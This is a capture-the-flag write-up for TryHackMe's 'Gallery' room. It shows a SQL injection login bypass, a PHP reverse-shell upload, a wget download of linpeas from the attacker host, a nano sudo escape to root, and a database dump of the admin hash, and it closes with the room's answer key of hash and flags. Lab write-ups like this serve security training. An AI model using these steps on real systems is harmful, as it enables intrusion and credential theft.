Skip to content

Gallery.md

Latest commit

 

History

History
133 lines (80 loc) · 2.95 KB

Gallery.md

File metadata and controls

133 lines (80 loc) · 2.95 KB

Gallery - Easy

sudo vim /etc/hosts
#add gallery.thm

nmap -T4 -p- -A -Pn -v gallery.thm

#bypass using SQLi
#upload php shell to Albums page

nc -nvlp 4444
#we get reverse shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm
#press Ctrl+Z
stty raw -echo; fg
#press Enter key twice

id
#www-data

#check directories /var/www, /opt, /home

cd /tmp

#in attacker machine
python3 -m http.server

#in victim machine
wget http://10.14.31.212:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh
#gives cleartext password

su mike
#use password

cd

#get user flag

sudo -l
#we can run script rootkit.sh as root

cat /opt/rootkit.sh
#uses rkhunter and nano

#gtfobins exploit for nano

sudo /bin/bash /opt/rootkit.sh
#give input 'read'
#in nano editor
#Ctrl+R, Ctrl+X
reset; sh 1>&0 2>&0

#we have shell as root
id

cat /root/root.txt

which mysql

mysql -u root
#MariaDB
#get admin hash

show databases;

use gallery_db;

show tables;

select * from users;
#get admin hash

  • Open ports & services:

    • 80 - http - Apache httpd 2.4.29 (Ubuntu)
    • 8080 - http - Apache httpd 2.4.29 (Ubuntu)

  • The webpage on port 80 is the default landing page for Apache on Ubuntu; we can leave it for now.

  • Checking the webpage on port 8080, we have a login portal for 'Simple Image Gallery System'.

  • As we do not have any clues regarding username/password, we can begin by trying injection to bypass login.

  • With the help of the payload admin' OR 1=1#, we are able to bypass login.

  • Now, for this 'Simple Image Gallery' CMS, we have an upload functionality in Albums.

  • We can first try uploading 'reverse-shell.php' file - surprisingly it works.

  • We can activate reverse shell by setting up listener and clicking on the uploaded PHP shell.

  • We have reverse shell as 'www-data'; we can stabilize it now.

  • Checking the /home directory shows that there is a user 'mike' - we need to find some way for privesc to mike.

  • Using linpeas shows the history files; this includes a cleartext password.

  • We are able to switch to user 'mike' using this password and get user flag.

  • Now, sudo -l shows that we can run a 'rootkit.sh' script as root.

  • This script allows the user to versioncheck, update, list or read a report.

  • The script uses the tools rkhunter and nano.

  • To use nano, we have to give the input 'read' after running the script.

  • Now, we have exploits on GTFObins for nano - we can use the exploit to get shell as root.

  • Running the exploit gives us root shell; we can read root flag.

  • To get the admin hash, we can run mysql as root - the hash is stored in the MariaDB database 'gallery_db'.

1. How many ports are open? - 2

2. What's the name of the CMS? - Simple Image Gallery

3. What's the hash password of the admin user? - a228b12a08b6527e7978cbe5d914531c

4. What's the user flag? - THM{af05cd30bfed67849befd546ef}

5. What's the root flag? - THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}